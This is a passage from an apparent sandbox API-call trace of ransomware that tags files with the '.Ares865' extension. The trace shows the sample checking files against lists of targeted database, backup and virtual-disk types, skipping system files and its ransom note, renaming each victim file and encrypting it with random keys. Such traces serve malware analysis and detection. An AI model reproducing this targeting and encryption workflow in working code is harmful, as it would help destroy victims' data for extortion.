(lpString1="ound.png", lpString2="daschema") returned 1 [0089.547] lstrlenW (lpString="db-journal") returned 10 [0089.547] lstrcmpiW (lpString1="ground.png", lpString2="db-journal") returned 1 [0089.547] lstrlenW (lpString="db-shm") returned 6 [0089.547] lstrcmpiW (lpString1="nd.png", lpString2="db-shm") returned 1 [0089.547] lstrlenW (lpString="db-wal") returned 6 [0089.547] lstrcmpiW (lpString1="nd.png", lpString2="db-wal") returned 1 [0089.547] lstrlenW (lpString="dbc") returned 3 [0089.547] lstrcmpiW (lpString1="png", lpString2="dbc") returned 1 [0089.547] lstrlenW (lpString="dbs") returned 3 [0089.547] lstrcmpiW (lpString1="png", lpString2="dbs") returned 1 [0089.547] lstrlenW (lpString="dbt") returned 3 [0089.547] lstrcmpiW (lpString1="png", lpString2="dbt") returned 1 [0089.547] lstrlenW (lpString="dbv") returned 3 [0089.547] lstrcmpiW (lpString1="png", lpString2="dbv") returned 1 [0089.547] lstrlenW (lpString="dbx") returned 3 [0089.547] lstrcmpiW (lpString1="png", lpString2="dbx") returned 1 [0089.547] lstrlenW (lpString="dcb") returned 3 [0089.547] lstrcmpiW (lpString1="png", lpString2="dcb") returned 1 [0089.547] lstrlenW (lpString="dct") returned 3 [0089.547] lstrcmpiW (lpString1="png", lpString2="dct") returned 1 [0089.547] lstrlenW (lpString="dcx") returned 3 [0089.547] lstrcmpiW (lpString1="png", lpString2="dcx") returned 1 [0089.547] lstrlenW (lpString="ddl") returned 3 [0089.547] lstrcmpiW (lpString1="png", lpString2="ddl") returned 1 [0089.547] lstrlenW (lpString="dlis") returned 4 [0089.547] lstrcmpiW (lpString1=".png", lpString2="dlis") returned -1 [0089.548] lstrlenW (lpString="dp1") returned 3 [0089.548] lstrcmpiW (lpString1="png", lpString2="dp1") returned 1 [0089.548] lstrlenW (lpString="dqy") returned 3 [0089.548] lstrcmpiW (lpString1="png", lpString2="dqy") returned 1 [0089.548] lstrlenW (lpString="dsk") returned 3 [0089.548] lstrcmpiW (lpString1="png", lpString2="dsk") returned 1 [0089.548] lstrlenW (lpString="dsn") returned 3 [0089.548] lstrcmpiW (lpString1="png", lpString2="dsn") returned 1 [0089.548] lstrlenW (lpString="dtsx") returned 4 [0089.548] lstrcmpiW (lpString1=".png", lpString2="dtsx") returned -1 [0089.548] lstrlenW (lpString="dxl") returned 3 [0089.548] lstrcmpiW (lpString1="png", lpString2="dxl") returned 1 [0089.548] lstrlenW (lpString="eco") returned 3 [0089.548] lstrcmpiW (lpString1="png", lpString2="eco") returned 1 [0089.548] lstrlenW (lpString="ecx") returned 3 [0089.548] lstrcmpiW (lpString1="png", lpString2="ecx") returned 1 [0089.548] lstrlenW (lpString="edb") returned 3 [0089.548] lstrcmpiW (lpString1="png", lpString2="edb") returned 1 [0089.548] lstrlenW (lpString="epim") returned 4 [0089.548] lstrcmpiW (lpString1=".png", lpString2="epim") returned -1 [0089.548] lstrlenW (lpString="fcd") returned 3 [0089.548] lstrcmpiW (lpString1="png", lpString2="fcd") returned 1 [0089.548] lstrlenW (lpString="fdb") returned 3 [0089.548] lstrcmpiW (lpString1="png", lpString2="fdb") returned 1 [0089.548] lstrlenW (lpString="fic") returned 3 [0089.548] lstrcmpiW (lpString1="png", lpString2="fic") returned 1 [0089.548] lstrlenW (lpString="flexolibrary") returned 12 [0089.548] lstrcmpiW (lpString1="ckground.png", lpString2="flexolibrary") returned -1 [0089.548] lstrlenW (lpString="fm5") returned 3 [0089.548] lstrcmpiW (lpString1="png", lpString2="fm5") returned 1 [0089.548] lstrlenW (lpString="fmp") returned 3 [0089.548] lstrcmpiW (lpString1="png", lpString2="fmp") returned 1 [0089.548] lstrlenW (lpString="fmp12") returned 5 [0089.548] lstrcmpiW (lpString1="d.png", lpString2="fmp12") returned -1 [0089.548] lstrlenW (lpString="fmpsl") returned 5 [0089.548] lstrcmpiW (lpString1="d.png", lpString2="fmpsl") returned -1 [0089.548] lstrlenW (lpString="fol") returned 3 [0089.548] lstrcmpiW (lpString1="png", lpString2="fol") returned 1 [0089.549] lstrlenW (lpString="fp3") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="fp3") returned 1 [0089.549] lstrlenW (lpString="fp4") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="fp4") returned 1 [0089.549] lstrlenW (lpString="fp5") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="fp5") returned 1 [0089.549] lstrlenW (lpString="fp7") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="fp7") returned 1 [0089.549] lstrlenW (lpString="fpt") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="fpt") returned 1 [0089.549] lstrlenW (lpString="frm") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="frm") returned 1 [0089.549] lstrlenW (lpString="gdb") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0089.549] lstrlenW (lpString="gdb") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0089.549] lstrlenW (lpString="grdb") returned 4 [0089.549] lstrcmpiW (lpString1=".png", lpString2="grdb") returned -1 [0089.549] lstrlenW (lpString="gwi") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="gwi") returned 1 [0089.549] lstrlenW (lpString="hdb") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="hdb") returned 1 [0089.549] lstrlenW (lpString="his") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="his") returned 1 [0089.549] lstrlenW (lpString="ib") returned 2 [0089.549] lstrcmpiW (lpString1="ng", lpString2="ib") returned 1 [0089.549] lstrlenW (lpString="idb") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="idb") returned 1 [0089.549] lstrlenW (lpString="ihx") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="ihx") returned 1 [0089.549] lstrlenW (lpString="itdb") returned 4 [0089.549] lstrcmpiW (lpString1=".png", lpString2="itdb") returned -1 [0089.549] lstrlenW (lpString="itw") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="itw") returned 1 [0089.549] lstrlenW (lpString="jet") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="jet") returned 1 [0089.549] lstrlenW (lpString="jtx") returned 3 [0089.549] lstrcmpiW (lpString1="png", lpString2="jtx") returned 1 [0089.550] lstrlenW (lpString="kdb") returned 3 [0089.550] lstrcmpiW (lpString1="png", lpString2="kdb") returned 1 [0089.550] lstrlenW (lpString="kexi") returned 4 [0089.550] lstrcmpiW (lpString1=".png", lpString2="kexi") returned -1 [0089.550] lstrlenW (lpString="kexic") returned 5 [0089.550] lstrcmpiW (lpString1="d.png", lpString2="kexic") returned -1 [0089.550] lstrlenW (lpString="kexis") returned 5 [0089.550] lstrcmpiW (lpString1="d.png", lpString2="kexis") returned -1 [0089.550] lstrlenW (lpString="lgc") returned 3 [0089.550] lstrcmpiW (lpString1="png", lpString2="lgc") returned 1 [0089.550] lstrlenW (lpString="lwx") returned 3 [0089.550] lstrcmpiW (lpString1="png", lpString2="lwx") returned 1 [0089.550] lstrlenW (lpString="maf") returned 3 [0089.550] lstrcmpiW (lpString1="png", lpString2="maf") returned 1 [0089.550] lstrlenW (lpString="maq") returned 3 [0089.550] lstrcmpiW (lpString1="png", lpString2="maq") returned 1 [0089.550] lstrlenW (lpString="mar") returned 3 [0089.550] lstrcmpiW (lpString1="png", lpString2="mar") returned 1 [0089.550] lstrlenW (lpString="marshal") returned 7 [0089.550] lstrcmpiW (lpString1="und.png", lpString2="marshal") returned 1 [0089.550] lstrlenW (lpString="mas") returned 3 [0089.550] lstrcmpiW (lpString1="png", lpString2="mas") returned 1 [0089.550] lstrlenW (lpString="mav") returned 3 [0089.550] lstrcmpiW (lpString1="png", lpString2="mav") returned 1 [0089.550] lstrlenW (lpString="maw") returned 3 [0089.550] lstrcmpiW (lpString1="png", lpString2="maw") returned 1 [0089.550] lstrlenW (lpString="mdbhtml") returned 7 [0089.550] lstrcmpiW (lpString1="und.png", lpString2="mdbhtml") returned 1 [0089.550] lstrlenW (lpString="mdn") returned 3 [0089.550] lstrcmpiW (lpString1="png", lpString2="mdn") returned 1 [0089.550] lstrlenW (lpString="mdt") returned 3 [0089.550] lstrcmpiW (lpString1="png", lpString2="mdt") returned 1 [0089.550] lstrlenW (lpString="mfd") returned 3 [0089.550] lstrcmpiW (lpString1="png", lpString2="mfd") returned 1 [0089.550] lstrlenW (lpString="mpd") returned 3 [0089.550] lstrcmpiW (lpString1="png", lpString2="mpd") returned 1 [0089.550] lstrlenW (lpString="mrg") returned 3 [0089.550] lstrcmpiW (lpString1="png", lpString2="mrg") returned 1 [0089.550] lstrlenW (lpString="mud") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="mud") returned 1 [0089.551] lstrlenW (lpString="mwb") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="mwb") returned 1 [0089.551] lstrlenW (lpString="myd") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="myd") returned 1 [0089.551] lstrlenW (lpString="ndf") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="ndf") returned 1 [0089.551] lstrlenW (lpString="nnt") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="nnt") returned 1 [0089.551] lstrlenW (lpString="nrmlib") returned 6 [0089.551] lstrcmpiW (lpString1="nd.png", lpString2="nrmlib") returned -1 [0089.551] lstrlenW (lpString="ns2") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="ns2") returned 1 [0089.551] lstrlenW (lpString="ns3") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="ns3") returned 1 [0089.551] lstrlenW (lpString="ns4") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="ns4") returned 1 [0089.551] lstrlenW (lpString="nsf") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="nsf") returned 1 [0089.551] lstrlenW (lpString="nv") returned 2 [0089.551] lstrcmpiW (lpString1="ng", lpString2="nv") returned -1 [0089.551] lstrlenW (lpString="nv2") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="nv2") returned 1 [0089.551] lstrlenW (lpString="nwdb") returned 4 [0089.551] lstrcmpiW (lpString1=".png", lpString2="nwdb") returned -1 [0089.551] lstrlenW (lpString="nyf") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="nyf") returned 1 [0089.551] lstrlenW (lpString="odb") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0089.551] lstrlenW (lpString="odb") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0089.551] lstrlenW (lpString="oqy") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="oqy") returned 1 [0089.551] lstrlenW (lpString="ora") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="ora") returned 1 [0089.551] lstrlenW (lpString="orx") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="orx") returned 1 [0089.551] lstrlenW (lpString="owc") returned 3 [0089.551] lstrcmpiW (lpString1="png", lpString2="owc") returned 1 [0089.552] lstrlenW (lpString="p96") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="p96") returned 1 [0089.552] lstrlenW (lpString="p97") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="p97") returned 1 [0089.552] lstrlenW (lpString="pan") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="pan") returned 1 [0089.552] lstrlenW (lpString="pdb") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="pdb") returned 1 [0089.552] lstrlenW (lpString="pdm") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="pdm") returned 1 [0089.552] lstrlenW (lpString="pnz") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="pnz") returned -1 [0089.552] lstrlenW (lpString="qry") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="qry") returned -1 [0089.552] lstrlenW (lpString="qvd") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="qvd") returned -1 [0089.552] lstrlenW (lpString="rbf") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="rbf") returned -1 [0089.552] lstrlenW (lpString="rctd") returned 4 [0089.552] lstrcmpiW (lpString1=".png", lpString2="rctd") returned -1 [0089.552] lstrlenW (lpString="rod") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="rod") returned -1 [0089.552] lstrlenW (lpString="rodx") returned 4 [0089.552] lstrcmpiW (lpString1=".png", lpString2="rodx") returned -1 [0089.552] lstrlenW (lpString="rpd") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="rpd") returned -1 [0089.552] lstrlenW (lpString="rsd") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="rsd") returned -1 [0089.552] lstrlenW (lpString="sas7bdat") returned 8 [0089.552] lstrcmpiW (lpString1="ound.png", lpString2="sas7bdat") returned -1 [0089.552] lstrlenW (lpString="sbf") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="sbf") returned -1 [0089.552] lstrlenW (lpString="scx") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="scx") returned -1 [0089.552] lstrlenW (lpString="sdb") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="sdb") returned -1 [0089.552] lstrlenW (lpString="sdc") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="sdc") returned -1 [0089.552] lstrlenW (lpString="sdf") returned 3 [0089.552] lstrcmpiW (lpString1="png", lpString2="sdf") returned -1 [0089.553] lstrlenW (lpString="sis") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="sis") returned -1 [0089.553] lstrlenW (lpString="spq") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="spq") returned -1 [0089.553] lstrlenW (lpString="te") returned 2 [0089.553] lstrcmpiW (lpString1="ng", lpString2="te") returned -1 [0089.553] lstrlenW (lpString="teacher") returned 7 [0089.553] lstrcmpiW (lpString1="und.png", lpString2="teacher") returned 1 [0089.553] lstrlenW (lpString="tmd") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="tmd") returned -1 [0089.553] lstrlenW (lpString="tps") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="tps") returned -1 [0089.553] lstrlenW (lpString="trc") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0089.553] lstrlenW (lpString="trc") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0089.553] lstrlenW (lpString="trm") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="trm") returned -1 [0089.553] lstrlenW (lpString="udb") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="udb") returned -1 [0089.553] lstrlenW (lpString="udl") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="udl") returned -1 [0089.553] lstrlenW (lpString="usr") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="usr") returned -1 [0089.553] lstrlenW (lpString="v12") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="v12") returned -1 [0089.553] lstrlenW (lpString="vis") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="vis") returned -1 [0089.553] lstrlenW (lpString="vpd") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="vpd") returned -1 [0089.553] lstrlenW (lpString="vvv") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="vvv") returned -1 [0089.553] lstrlenW (lpString="wdb") returned 3 [0089.553] lstrcmpiW (lpString1="png", lpString2="wdb") returned -1 [0089.553] lstrlenW (lpString="wmdb") returned 4 [0089.553] lstrcmpiW (lpString1=".png", lpString2="wmdb") returned -1 [0089.553] lstrlenW (lpString="wrk") returned 3 [0089.554] lstrcmpiW (lpString1="png", lpString2="wrk") returned -1 [0089.554] lstrlenW (lpString="xdb") returned 3 [0089.554] lstrcmpiW (lpString1="png", lpString2="xdb") returned -1 [0089.554] lstrlenW (lpString="xld") returned 3 [0089.554] lstrcmpiW (lpString1="png", lpString2="xld") returned -1 [0089.554] lstrlenW (lpString="xmlff") returned 5 [0089.554] lstrcmpiW (lpString1="d.png", lpString2="xmlff") returned -1 [0089.554] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.Ares865") returned 110 [0089.554] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.ares865"), dwFlags=0x1) returned 1 [0089.555] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.555] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=129745) returned 1 [0089.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.555] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.556] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.556] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.556] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1fde0, lpName=0x0) returned 0x15c [0089.558] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1fde0) returned 0x190000 [0089.565] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.565] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.565] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.566] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.566] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.566] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.566] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.566] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.566] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.567] CloseHandle (hObject=0x15c) returned 1 [0089.567] CloseHandle (hObject=0x118) returned 1 [0089.567] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.567] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.567] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.568] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c5b0d9, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0xc7c5b0d9, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x4c84ada0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xe70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="behavior.xml.Ares865", cAlternateFileName="")) returned 1 [0089.568] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.568] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0089.568] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2=".") returned 1 [0089.568] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="..") returned 1 [0089.568] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="windows") returned -1 [0089.568] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="bootmgr") returned -1 [0089.568] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="temp") returned -1 [0089.568] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="pagefile.sys") returned -1 [0089.568] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="boot") returned -1 [0089.568] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="ids.txt") returned -1 [0089.568] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="ntuser.dat") returned -1 [0089.568] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="perflogs") returned -1 [0089.568] lstrcmpiW (lpString1="behavior.xml.Ares865", lpString2="MSBuild") returned -1 [0089.569] lstrlenW (lpString="behavior.xml.Ares865") returned 20 [0089.569] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 102 [0089.569] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="behavior.xml.Ares865" | out: lpString1="behavior.xml.Ares865") returned="behavior.xml.Ares865" [0089.569] lstrlenW (lpString="behavior.xml.Ares865") returned 20 [0089.569] lstrlenW (lpString="Ares865") returned 7 [0089.569] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.569] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f07a66f, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f07a66f, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76b3ce5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xadc8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="device.png", cAlternateFileName="")) returned 1 [0089.569] lstrcmpiW (lpString1="device.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.569] lstrcmpiW (lpString1="device.png", lpString2="aoldtz.exe") returned 1 [0089.569] lstrcmpiW (lpString1="device.png", lpString2=".") returned 1 [0089.569] lstrcmpiW (lpString1="device.png", lpString2="..") returned 1 [0089.569] lstrcmpiW (lpString1="device.png", lpString2="windows") returned -1 [0089.569] lstrcmpiW (lpString1="device.png", lpString2="bootmgr") returned 1 [0089.569] lstrcmpiW (lpString1="device.png", lpString2="temp") returned -1 [0089.569] lstrcmpiW (lpString1="device.png", lpString2="pagefile.sys") returned -1 [0089.569] lstrcmpiW (lpString1="device.png", lpString2="boot") returned 1 [0089.569] lstrcmpiW (lpString1="device.png", lpString2="ids.txt") returned -1 [0089.569] lstrcmpiW (lpString1="device.png", lpString2="ntuser.dat") returned -1 [0089.569] lstrcmpiW (lpString1="device.png", lpString2="perflogs") returned -1 [0089.569] lstrcmpiW (lpString1="device.png", lpString2="MSBuild") returned -1 [0089.569] lstrlenW (lpString="device.png") returned 10 [0089.569] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.Ares865") returned 108 [0089.569] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="device.png" | out: lpString1="device.png") returned="device.png" [0089.569] lstrlenW (lpString="device.png") returned 10 [0089.569] lstrlenW (lpString="Ares865") returned 7 [0089.569] lstrcmpiW (lpString1="ice.png", lpString2="Ares865") returned 1 [0089.569] lstrlenW (lpString=".dll") returned 4 [0089.569] lstrcmpiW (lpString1="device.png", lpString2=".dll") returned 1 [0089.569] lstrlenW (lpString=".lnk") returned 4 [0089.569] lstrcmpiW (lpString1="device.png", lpString2=".lnk") returned 1 [0089.569] lstrlenW (lpString=".ini") returned 4 [0089.569] lstrcmpiW (lpString1="device.png", lpString2=".ini") returned 1 [0089.569] lstrlenW (lpString=".sys") returned 4 [0089.569] lstrcmpiW (lpString1="device.png", lpString2=".sys") returned 1 [0089.570] lstrlenW (lpString="device.png") returned 10 [0089.570] lstrlenW (lpString="bak") returned 3 [0089.570] lstrcmpiW (lpString1="png", lpString2="bak") returned 1 [0089.570] lstrlenW (lpString="ba_") returned 3 [0089.570] lstrcmpiW (lpString1="png", lpString2="ba_") returned 1 [0089.570] lstrlenW (lpString="dbb") returned 3 [0089.570] lstrcmpiW (lpString1="png", lpString2="dbb") returned 1 [0089.570] lstrlenW (lpString="vmdk") returned 4 [0089.570] lstrcmpiW (lpString1=".png", lpString2="vmdk") returned -1 [0089.570] lstrlenW (lpString="rar") returned 3 [0089.570] lstrcmpiW (lpString1="png", lpString2="rar") returned -1 [0089.570] lstrlenW (lpString="zip") returned 3 [0089.570] lstrcmpiW (lpString1="png", lpString2="zip") returned -1 [0089.570] lstrlenW (lpString="tgz") returned 3 [0089.570] lstrcmpiW (lpString1="png", lpString2="tgz") returned -1 [0089.570] lstrlenW (lpString="vbox") returned 4 [0089.570] lstrcmpiW (lpString1=".png", lpString2="vbox") returned -1 [0089.570] lstrlenW (lpString="vdi") returned 3 [0089.570] lstrcmpiW (lpString1="png", lpString2="vdi") returned -1 [0089.570] lstrlenW (lpString="vhd") returned 3 [0089.570] lstrcmpiW (lpString1="png", lpString2="vhd") returned -1 [0089.570] lstrlenW (lpString="vhdx") returned 4 [0089.570] lstrcmpiW (lpString1=".png", lpString2="vhdx") returned -1 [0089.570] lstrlenW (lpString="avhd") returned 4 [0089.570] lstrcmpiW (lpString1=".png", lpString2="avhd") returned -1 [0089.570] lstrlenW (lpString="db") returned 2 [0089.570] lstrcmpiW (lpString1="ng", lpString2="db") returned 1 [0089.570] lstrlenW (lpString="db2") returned 3 [0089.570] lstrcmpiW (lpString1="png", lpString2="db2") returned 1 [0089.570] lstrlenW (lpString="db3") returned 3 [0089.570] lstrcmpiW (lpString1="png", lpString2="db3") returned 1 [0089.570] lstrlenW (lpString="dbf") returned 3 [0089.570] lstrcmpiW (lpString1="png", lpString2="dbf") returned 1 [0089.570] lstrlenW (lpString="mdf") returned 3 [0089.570] lstrcmpiW (lpString1="png", lpString2="mdf") returned 1 [0089.570] lstrlenW (lpString="mdb") returned 3 [0089.570] lstrcmpiW (lpString1="png", lpString2="mdb") returned 1 [0089.570] lstrlenW (lpString="sql") returned 3 [0089.570] lstrcmpiW (lpString1="png", lpString2="sql") returned -1 [0089.571] lstrlenW (lpString="sqlite") returned 6 [0089.571] lstrcmpiW (lpString1="ce.png", lpString2="sqlite") returned -1 [0089.571] lstrlenW (lpString="sqlite3") returned 7 [0089.571] lstrcmpiW (lpString1="ice.png", lpString2="sqlite3") returned -1 [0089.571] lstrlenW (lpString="sqlitedb") returned 8 [0089.571] lstrcmpiW (lpString1="vice.png", lpString2="sqlitedb") returned 1 [0089.571] lstrlenW (lpString="xml") returned 3 [0089.571] lstrcmpiW (lpString1="png", lpString2="xml") returned -1 [0089.571] lstrlenW (lpString="$er") returned 3 [0089.571] lstrcmpiW (lpString1="png", lpString2="$er") returned 1 [0089.571] lstrlenW (lpString="4dd") returned 3 [0089.571] lstrcmpiW (lpString1="png", lpString2="4dd") returned 1 [0089.571] lstrlenW (lpString="4dl") returned 3 [0089.571] lstrcmpiW (lpString1="png", lpString2="4dl") returned 1 [0089.571] lstrlenW 